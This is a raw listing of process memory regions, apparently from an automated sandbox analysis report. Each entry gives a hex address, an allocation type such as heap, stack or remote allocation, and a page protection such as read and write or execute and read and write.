5736000
|
heap
|
page read and write
|
||
6A32000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
85E0000
|
heap
|
page read and write
|
||
456D000
|
trusted library allocation
|
page execute and read and write
|
||
6A76000
|
heap
|
page read and write
|
||
879E000
|
stack
|
page read and write
|
||
6F6E000
|
stack
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
AD5000
|
heap
|
page read and write
|
||
4D45000
|
trusted library allocation
|
page read and write
|
||
51A6000
|
trusted library allocation
|
page read and write
|
||
8030000
|
heap
|
page read and write
|
||
8C30000
|
trusted library allocation
|
page read and write
|
||
5CE9000
|
trusted library allocation
|
page read and write
|
||
65AC000
|
trusted library allocation
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
4640000
|
heap
|
page readonly
|
||
6A08000
|
heap
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
34E0000
|
trusted library allocation
|
page execute and read and write
|
||
746E000
|
stack
|
page read and write
|
||
550E000
|
heap
|
page read and write
|
||
7302000
|
heap
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
4F20000
|
heap
|
page read and write
|
||
E2B000
|
heap
|
page read and write
|
||
AD9000
|
heap
|
page read and write
|
||
756D000
|
stack
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
4670000
|
trusted library allocation
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
5A20000
|
heap
|
page read and write
|
||
E3E000
|
stack
|
page read and write
|
||
5196000
|
trusted library allocation
|
page read and write
|
||
57C3000
|
heap
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
69FC000
|
heap
|
page read and write
|
||
330E000
|
unkown
|
page read and write
|
||
7BB0000
|
trusted library allocation
|
page execute and read and write
|
||
2F1F000
|
heap
|
page read and write
|
||
4DBC000
|
heap
|
page read and write
|
||
74B0000
|
heap
|
page execute and read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
759E000
|
stack
|
page read and write
|
||
6A0A000
|
heap
|
page read and write
|
||
6A0A000
|
heap
|
page read and write
|
||
54B7000
|
heap
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
6DA0000
|
heap
|
page read and write
|
||
853C000
|
trusted library allocation
|
page read and write
|
||
6807000
|
heap
|
page read and write
|
||
4760000
|
heap
|
page read and write
|
||
4CC9000
|
trusted library allocation
|
page read and write
|
||
3391000
|
heap
|
page read and write
|
||
7220000
|
heap
|
page read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
2F4A000
|
heap
|
page read and write
|
||
45B0000
|
trusted library allocation
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
2A6F000
|
stack
|
page read and write
|
||
665B000
|
trusted library allocation
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
80C0000
|
heap
|
page read and write
|
||
77EE000
|
stack
|
page read and write
|
||
7931000
|
heap
|
page read and write
|
||
4DC2000
|
heap
|
page read and write
|
||
5F6B000
|
stack
|
page read and write
|
||
5D49000
|
trusted library allocation
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
32F2000
|
heap
|
page read and write
|
||
283E000
|
stack
|
page read and write
|
||
5736000
|
heap
|
page read and write
|
||
870D000
|
stack
|
page read and write
|
||
6556000
|
heap
|
page read and write
|
||
CD6000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page execute and read and write
|
||
73B5000
|
heap
|
page execute and read and write
|
||
6A0A000
|
heap
|
page read and write
|
||
5969000
|
trusted library allocation
|
page read and write
|
||
6A47000
|
heap
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
10000000
|
direct allocation
|
page read and write
|
||
24AF000
|
stack
|
page read and write
|
||
794A000
|
trusted library allocation
|
page read and write
|
||
4E0F000
|
heap
|
page read and write
|
||
5702000
|
heap
|
page read and write
|
||
6584000
|
heap
|
page read and write
|
||
2E93000
|
heap
|
page read and write
|
||
8828000
|
heap
|
page read and write
|
||
51A2000
|
trusted library allocation
|
page read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
8080000
|
trusted library allocation
|
page execute and read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
8530000
|
trusted library allocation
|
page read and write
|
||
7590000
|
trusted library allocation
|
page read and write
|
||
8A21000
|
trusted library allocation
|
page read and write
|
||
743D000
|
stack
|
page read and write
|
||
5421000
|
heap
|
page read and write
|
||
73A9000
|
heap
|
page read and write
|
||
7A86000
|
trusted library allocation
|
page read and write
|
||
3391000
|
heap
|
page read and write
|
||
78A0000
|
heap
|
page execute and read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
3332000
|
heap
|
page read and write
|
||
A9F000
|
stack
|
page read and write
|
||
5436000
|
heap
|
page read and write
|
||
6A7D000
|
heap
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
80BF000
|
stack
|
page read and write
|
||
DC2000
|
trusted library allocation
|
page read and write
|
||
46BF000
|
stack
|
page read and write
|
||
74BE000
|
stack
|
page read and write
|
||
2E92000
|
heap
|
page read and write
|
||
8070000
|
heap
|
page read and write
|
||
6A11000
|
heap
|
page read and write
|
||
2E5A000
|
heap
|
page read and write
|
||
88A0000
|
heap
|
page read and write
|
||
5194000
|
trusted library allocation
|
page read and write
|
||
68A6000
|
direct allocation
|
page read and write
|
||
747B000
|
stack
|
page read and write
|
||
56E1000
|
heap
|
page read and write
|
||
64AF000
|
heap
|
page read and write
|
||
8070000
|
trusted library allocation
|
page read and write
|
||
7D00000
|
direct allocation
|
page read and write
|
||
6999000
|
heap
|
page read and write
|
||
472E000
|
stack
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
606D000
|
stack
|
page read and write
|
||
582B000
|
heap
|
page read and write
|
||
5753000
|
heap
|
page read and write
|
||
326F000
|
stack
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
569E000
|
stack
|
page read and write
|
||
73FF000
|
heap
|
page read and write
|
||
64AF000
|
heap
|
page read and write
|
||
B3E000
|
heap
|
page read and write
|
||
56EC000
|
heap
|
page read and write
|
||
4AED000
|
trusted library allocation
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
4DAD000
|
heap
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
790C000
|
heap
|
page read and write
|
||
5716000
|
heap
|
page read and write
|
||
75AE000
|
stack
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
7FB08000
|
trusted library allocation
|
page execute and read and write
|
||
2F1E000
|
heap
|
page read and write
|
||
583D000
|
heap
|
page read and write
|
||
DA0000
|
trusted library allocation
|
page read and write
|
||
753D000
|
stack
|
page read and write
|
||
1050000
|
heap
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
2F7C000
|
heap
|
page read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
32A0000
|
trusted library allocation
|
page read and write
|
||
5CE1000
|
trusted library allocation
|
page read and write
|
||
5040000
|
trusted library allocation
|
page read and write
|
||
6E3A000
|
stack
|
page read and write
|
||
518B000
|
trusted library allocation
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
579F000
|
stack
|
page read and write
|
||
6A45000
|
heap
|
page read and write
|
||
71C000
|
stack
|
page read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
73DF000
|
heap
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
5020000
|
heap
|
page read and write
|
||
78A0000
|
heap
|
page read and write
|
||
8040000
|
trusted library allocation
|
page execute and read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
759000
|
stack
|
page read and write
|
||
72FD000
|
stack
|
page read and write
|
||
70ED000
|
stack
|
page read and write
|
||
65B1000
|
trusted library allocation
|
page read and write
|
||
54B9000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
BB6000
|
heap
|
page read and write
|
||
33AC000
|
heap
|
page read and write
|
||
72BD000
|
stack
|
page read and write
|
||
6D5E000
|
stack
|
page read and write
|
||
6CF0000
|
heap
|
page execute and read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
4750000
|
trusted library allocation
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
73EE000
|
heap
|
page read and write
|
||
8660000
|
heap
|
page read and write
|
||
7826000
|
heap
|
page read and write
|
||
5507000
|
heap
|
page read and write
|
||
574E000
|
heap
|
page read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
2F2E000
|
heap
|
page read and write
|
||
8090000
|
trusted library allocation
|
page read and write
|
||
6565000
|
heap
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
5731000
|
heap
|
page read and write
|
||
4E2D000
|
heap
|
page read and write
|
||
3391000
|
heap
|
page read and write
|
||
4CE000
|
stack
|
page read and write
|
||
33AA000
|
heap
|
page read and write
|
||
DC5000
|
trusted library allocation
|
page execute and read and write
|
||
2F1E000
|
heap
|
page read and write
|
||
DAC000
|
heap
|
page read and write
|
||
3412000
|
trusted library allocation
|
page read and write
|
||
5505000
|
heap
|
page read and write
|
||
2894000
|
heap
|
page read and write
|
||
FCF000
|
stack
|
page read and write
|
||
4DA8000
|
trusted library allocation
|
page read and write
|
||
2E61000
|
heap
|
page read and write
|
||
6996000
|
heap
|
page read and write
|
||
4DC9000
|
heap
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
5451000
|
heap
|
page read and write
|
||
4EB0000
|
heap
|
page execute and read and write
|
||
33D0000
|
trusted library allocation
|
page read and write
|
||
6A32000
|
heap
|
page read and write
|
||
550A000
|
heap
|
page read and write
|
||
73EA000
|
heap
|
page read and write
|
||
4B2E000
|
stack
|
page read and write
|
||
73D8000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
5256000
|
trusted library allocation
|
page read and write
|
||
B09000
|
heap
|
page read and write
|
||
2EEB000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
5A1E000
|
stack
|
page read and write
|
||
AF4000
|
stack
|
page read and write
|
||
6565000
|
heap
|
page read and write
|
||
910000
|
heap
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
2BAF000
|
stack
|
page read and write
|
||
3A0000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
8896000
|
heap
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
7256000
|
trusted library allocation
|
page read and write
|
||
339A000
|
heap
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page read and write
|
||
3391000
|
heap
|
page read and write
|
||
6231000
|
trusted library allocation
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
3707000
|
heap
|
page read and write
|
||
8820000
|
heap
|
page read and write
|
||
338B000
|
heap
|
page read and write
|
||
6650000
|
trusted library allocation
|
page read and write
|
||
315B000
|
stack
|
page read and write
|
||
BEC000
|
stack
|
page read and write
|
||
5839000
|
heap
|
page read and write
|
||
4E18000
|
heap
|
page read and write
|
||
12CE000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
706E000
|
stack
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
6BED000
|
trusted library allocation
|
page read and write
|
||
4EA0000
|
heap
|
page read and write
|
||
570F000
|
trusted library allocation
|
page read and write
|
||
B4E000
|
stack
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
4CD4000
|
heap
|
page read and write
|
||
7BAE000
|
stack
|
page read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
28B3000
|
heap
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
5F39000
|
trusted library allocation
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
6584000
|
heap
|
page read and write
|
||
5253000
|
trusted library allocation
|
page read and write
|
||
ABF000
|
heap
|
page read and write
|
||
4740000
|
trusted library allocation
|
page execute and read and write
|
||
6A97000
|
heap
|
page read and write
|
||
3706000
|
heap
|
page read and write
|
||
32C5000
|
trusted library allocation
|
page execute and read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
551B000
|
heap
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
550D000
|
heap
|
page read and write
|
||
751E000
|
stack
|
page read and write
|
||
73A1000
|
heap
|
page read and write
|
||
60DE000
|
trusted library allocation
|
page read and write
|
||
508F000
|
stack
|
page read and write
|
||
4CD6000
|
heap
|
page read and write
|
||
327F000
|
stack
|
page read and write
|
||
5007000
|
trusted library allocation
|
page read and write
|
||
282C000
|
stack
|
page read and write
|
||
6AC2000
|
heap
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
33E3000
|
trusted library allocation
|
page execute and read and write
|
||
2E51000
|
heap
|
page read and write
|
||
7866000
|
heap
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
4CF9000
|
trusted library allocation
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
6F40000
|
heap
|
page read and write
|
||
4E18000
|
heap
|
page read and write
|
||
7020000
|
heap
|
page execute and read and write
|
||
5D09000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
7408000
|
heap
|
page read and write
|
||
582E000
|
heap
|
page read and write
|
||
7897000
|
heap
|
page read and write
|
||
6A0A000
|
heap
|
page read and write
|
||
7B5E000
|
stack
|
page read and write
|
||
881E000
|
stack
|
page read and write
|
||
71BD000
|
stack
|
page read and write
|
||
304C000
|
heap
|
page read and write
|
||
7872000
|
heap
|
page read and write
|
||
85D000
|
stack
|
page read and write
|
||
7FAF0000
|
trusted library allocation
|
page execute and read and write
|
||
4EC0000
|
heap
|
page read and write
|
||
2F1E000
|
heap
|
page read and write
|
||
4E0A000
|
heap
|
page read and write
|
||
4563000
|
trusted library allocation
|
page execute and read and write
|
||
2E62000
|
heap
|
page read and write
|
||
3387000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
339D000
|
heap
|
page read and write
|
||
7370000
|
heap
|
page read and write
|
||
7670000
|
trusted library allocation
|
page read and write
|
||
6AB4000
|
heap
|
page read and write
|
||
4F91000
|
trusted library allocation
|
page read and write
|
||
2E5D000
|
heap
|
page read and write
|
||
32E0000
|
trusted library allocation
|
page read and write
|
||
879E000
|
stack
|
page read and write
|
||
4EA0000
|
trusted library allocation
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
6514000
|
heap
|
page read and write
|
||
74FE000
|
stack
|
page read and write
|
||
2E3F000
|
heap
|
page read and write
|
||
4560000
|
trusted library allocation
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
4592000
|
trusted library allocation
|
page read and write
|
||
2F03000
|
heap
|
page read and write
|
||
AECE000
|
stack
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
5B9D000
|
stack
|
page read and write
|
||
6A50000
|
heap
|
page read and write
|
||
719C000
|
stack
|
page read and write
|
||
2F0D000
|
heap
|
page read and write
|
||
4EC6000
|
heap
|
page read and write
|
||
6890000
|
trusted library allocation
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
7580000
|
trusted library allocation
|
page execute and read and write
|
||
6AB2000
|
heap
|
page read and write
|
||
6CF5000
|
heap
|
page execute and read and write
|
||
6A92000
|
heap
|
page read and write
|
||
48CD000
|
trusted library allocation
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
6A97000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
7032000
|
heap
|
page read and write
|
||
34BE000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
6E6F000
|
stack
|
page read and write
|
||
8868000
|
heap
|
page read and write
|
||
6AE6000
|
heap
|
page read and write
|
||
54B9000
|
heap
|
page read and write
|
||
DFC000
|
stack
|
page read and write
|
||
3410000
|
trusted library allocation
|
page read and write
|
||
327F000
|
stack
|
page read and write
|
||
E48000
|
heap
|
page read and write
|
||
64A0000
|
heap
|
page read and write
|
||
347E000
|
stack
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
3700000
|
heap
|
page read and write
|
||
7A6E000
|
stack
|
page read and write
|
||
72DF000
|
heap
|
page read and write
|
||
3019000
|
heap
|
page read and write
|
||
27FE000
|
stack
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
4EFC000
|
stack
|
page read and write
|
||
4DE9000
|
heap
|
page read and write
|
||
D4C000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
4CE1000
|
trusted library allocation
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
7B00000
|
trusted library allocation
|
page read and write
|
||
8174000
|
heap
|
page read and write
|
||
7392000
|
heap
|
page read and write
|
||
DA9000
|
trusted library allocation
|
page read and write
|
||
6C8E000
|
stack
|
page read and write
|
||
6A7B000
|
heap
|
page read and write
|
||
5871000
|
trusted library allocation
|
page read and write
|
||
5480000
|
heap
|
page read and write
|
||
5505000
|
heap
|
page read and write
|
||
689E000
|
trusted library allocation
|
page read and write
|
||
4DEB000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
D94000
|
trusted library allocation
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
2E6F000
|
heap
|
page read and write
|
||
57AD000
|
trusted library allocation
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
63C5000
|
trusted library allocation
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
78D3000
|
heap
|
page read and write
|
||
4DC8000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
7647000
|
trusted library allocation
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
2AAE000
|
stack
|
page read and write
|
||
65A3000
|
trusted library allocation
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
6565000
|
heap
|
page read and write
|
||
6B30000
|
trusted library allocation
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
B0E000
|
stack
|
page read and write
|
||
2E80000
|
heap
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
78E6000
|
heap
|
page read and write
|
||
4E5F000
|
stack
|
page read and write
|
||
B01000
|
heap
|
page read and write
|
||
712E000
|
stack
|
page read and write
|
||
762E000
|
stack
|
page read and write
|
||
6D9E000
|
stack
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
7A90000
|
trusted library allocation
|
page read and write
|
||
73FF000
|
stack
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
6A90000
|
heap
|
page read and write
|
||
6534000
|
heap
|
page read and write
|
||
B48000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
7025000
|
heap
|
page execute and read and write
|
||
3374000
|
heap
|
page read and write
|
||
6554000
|
heap
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
51BE000
|
stack
|
page read and write
|
||
696E000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
B4A000
|
heap
|
page read and write
|
||
6299000
|
trusted library allocation
|
page read and write
|
||
582A000
|
heap
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
CFE000
|
stack
|
page read and write
|
||
4579000
|
trusted library allocation
|
page read and write
|
||
7810000
|
heap
|
page execute and read and write
|
||
8D9F000
|
stack
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
2CF7000
|
stack
|
page read and write
|
||
2E27000
|
heap
|
page read and write
|
||
9A21000
|
trusted library allocation
|
page read and write
|
||
69FE000
|
heap
|
page read and write
|
||
85DF000
|
stack
|
page read and write
|
||
339C000
|
heap
|
page read and write
|
||
50BD000
|
stack
|
page read and write
|
||
336F000
|
heap
|
page read and write
|
||
762E000
|
stack
|
page read and write
|
||
8550000
|
trusted library allocation
|
page read and write
|
||
72FA000
|
stack
|
page read and write
|
||
33B1000
|
heap
|
page read and write
|
||
2E65000
|
heap
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
7820000
|
heap
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
10001000
|
direct allocation
|
page execute and read and write
|
||
2F19000
|
heap
|
page read and write
|
||
3B1E000
|
heap
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
843E000
|
stack
|
page read and write
|
||
2840000
|
heap
|
page read and write
|
||
67D0000
|
trusted library allocation
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
888C000
|
stack
|
page read and write
|
||
10FB000
|
heap
|
page read and write
|
||
4F9C000
|
trusted library allocation
|
page read and write
|
||
6657000
|
trusted library allocation
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
AE80000
|
trusted library allocation
|
page read and write
|
||
51D4000
|
heap
|
page read and write
|
||
33AE000
|
heap
|
page read and write
|
||
2CAE000
|
stack
|
page read and write
|
||
5292000
|
trusted library allocation
|
page read and write
|
||
4E16000
|
heap
|
page read and write
|
||
47B0000
|
direct allocation
|
page read and write
|
||
6A90000
|
heap
|
page read and write
|
||
64B0000
|
heap
|
page read and write
|
||
6A08000
|
heap
|
page read and write
|
||
574E000
|
heap
|
page read and write
|
||
12F5000
|
heap
|
page read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
AEF000
|
stack
|
page read and write
|
||
4DD2000
|
heap
|
page read and write
|
||
2891000
|
heap
|
page read and write
|
||
329D000
|
trusted library allocation
|
page execute and read and write
|
||
33B3000
|
heap
|
page read and write
|
||
6521000
|
heap
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
6534000
|
heap
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
2ED4000
|
heap
|
page read and write
|
||
BA5000
|
heap
|
page read and write
|
||
76B0000
|
heap
|
page read and write
|
||
45E7000
|
heap
|
page read and write
|
||
5443000
|
heap
|
page read and write
|
||
815C000
|
heap
|
page read and write
|
||
766F000
|
stack
|
page read and write
|
||
69BA000
|
heap
|
page read and write
|
||
46EC000
|
stack
|
page read and write
|
||
4670000
|
heap
|
page read and write
|
||
528F000
|
stack
|
page read and write
|
||
7269000
|
heap
|
page read and write
|
||
33A1000
|
heap
|
page read and write
|
||
655D000
|
heap
|
page read and write
|
||
56C000
|
stack
|
page read and write
|
||
473E000
|
stack
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
573E000
|
heap
|
page read and write
|
||
D80000
|
trusted library allocation
|
page read and write
|
||
370B000
|
heap
|
page read and write
|
||
7B1F000
|
stack
|
page read and write
|
||
68E0000
|
trusted library allocation
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
BAE000
|
stack
|
page read and write
|
||
300E000
|
stack
|
page read and write
|
||
6A89000
|
heap
|
page read and write
|
||
33B6000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
78C0000
|
trusted library allocation
|
page read and write
|
||
2EFB000
|
heap
|
page read and write
|
||
305B000
|
stack
|
page read and write
|
||
575E000
|
heap
|
page read and write
|
||
64F8000
|
heap
|
page read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
700E000
|
stack
|
page read and write
|
||
5220000
|
heap
|
page execute and read and write
|
||
6521000
|
heap
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
33BA000
|
heap
|
page read and write
|
||
8150000
|
heap
|
page read and write
|
||
2E66000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
28B0000
|
heap
|
page read and write
|
||
5428000
|
heap
|
page read and write
|
||
56DF000
|
stack
|
page read and write
|
||
352F000
|
stack
|
page read and write
|
||
6D1E000
|
stack
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
70EE000
|
stack
|
page read and write
|
||
4DB0000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
2DFD000
|
stack
|
page read and write
|
||
4FB0000
|
heap
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
4BAE000
|
stack
|
page read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
522F000
|
trusted library allocation
|
page read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
BE6000
|
heap
|
page read and write
|
||
7B6F000
|
stack
|
page read and write
|
||
6514000
|
heap
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
AF0E000
|
stack
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
3A42000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
4BF0000
|
heap
|
page execute and read and write
|
||
79CE000
|
stack
|
page read and write
|
||
7264000
|
heap
|
page read and write
|
||
57DB000
|
stack
|
page read and write
|
||
54C3000
|
heap
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
6EFE000
|
stack
|
page read and write
|
||
3010000
|
heap
|
page read and write
|
||
C28000
|
stack
|
page read and write
|
||
2E1A000
|
heap
|
page read and write
|
||
333E000
|
heap
|
page read and write
|
||
73F7000
|
heap
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
12D0000
|
heap
|
page read and write
|
||
56E1000
|
heap
|
page read and write
|
||
463E000
|
stack
|
page read and write
|
||
6A35000
|
heap
|
page read and write
|
||
3999000
|
heap
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
69FC000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
7AE0000
|
trusted library allocation
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
33E4000
|
trusted library allocation
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
696E000
|
heap
|
page read and write
|
||
7F940000
|
trusted library allocation
|
page execute and read and write
|
||
6553000
|
heap
|
page read and write
|
||
7692000
|
heap
|
page read and write
|
||
57C4000
|
heap
|
page read and write
|
||
6D9E000
|
stack
|
page read and write
|
||
72B9000
|
heap
|
page read and write
|
||
56E0000
|
heap
|
page read and write
|
||
51D0000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
7850000
|
heap
|
page read and write
|
||
6553000
|
heap
|
page read and write
|
||
478000
|
remote allocation
|
page execute and read and write
|
||
3373000
|
heap
|
page read and write
|
||
2E72000
|
heap
|
page read and write
|
||
32A9000
|
trusted library allocation
|
page read and write
|
||
5706000
|
heap
|
page read and write
|
||
5386000
|
trusted library allocation
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
4EC3000
|
heap
|
page read and write
|
||
85F0000
|
heap
|
page read and write
|
||
6A66000
|
heap
|
page read and write
|
||
75FD000
|
trusted library allocation
|
page read and write
|
||
2F1A000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
7790000
|
heap
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
56F1000
|
heap
|
page read and write
|
||
54C1000
|
heap
|
page read and write
|
||
852E000
|
trusted library allocation
|
page read and write
|
||
3398000
|
heap
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
504F000
|
trusted library allocation
|
page read and write
|
||
69FE000
|
heap
|
page read and write
|
||
2E51000
|
heap
|
page read and write
|
||
7300000
|
heap
|
page read and write
|
||
4E90000
|
trusted library allocation
|
page execute and read and write
|
||
2870000
|
heap
|
page read and write
|
||
88DB000
|
heap
|
page read and write
|
||
54C3000
|
heap
|
page read and write
|
||
2F1E000
|
heap
|
page read and write
|
||
30BF000
|
heap
|
page read and write
|
||
699B000
|
heap
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
78CB000
|
heap
|
page read and write
|
||
8695000
|
trusted library allocation
|
page read and write
|
||
4E02000
|
heap
|
page read and write
|
||
2E65000
|
heap
|
page read and write
|
||
3280000
|
trusted library allocation
|
page read and write
|
||
5F31000
|
trusted library allocation
|
page read and write
|
||
6A6B000
|
heap
|
page read and write
|
||
33C000
|
stack
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
6A36000
|
heap
|
page read and write
|
||
8520000
|
trusted library allocation
|
page read and write
|
||
6D8F000
|
stack
|
page read and write
|
||
342E000
|
stack
|
page read and write
|
||
6C0D000
|
trusted library allocation
|
page read and write
|
||
65A1000
|
trusted library allocation
|
page read and write
|
||
63E5000
|
trusted library allocation
|
page read and write
|
||
65A5000
|
trusted library allocation
|
page read and write
|
||
4C3E000
|
stack
|
page read and write
|
||
4DAD000
|
trusted library allocation
|
page read and write
|
||
57E0000
|
heap
|
page read and write
|
||
350F000
|
stack
|
page read and write
|
||
4860000
|
heap
|
page execute and read and write
|
||
4FE8000
|
trusted library allocation
|
page read and write
|
||
8670000
|
trusted library allocation
|
page execute and read and write
|
||
6654000
|
trusted library allocation
|
page read and write
|
||
370B000
|
heap
|
page read and write
|
||
838F000
|
stack
|
page read and write
|
||
4E30000
|
heap
|
page read and write
|
||
EC0000
|
heap
|
page read and write
|
||
65B5000
|
trusted library allocation
|
page read and write
|
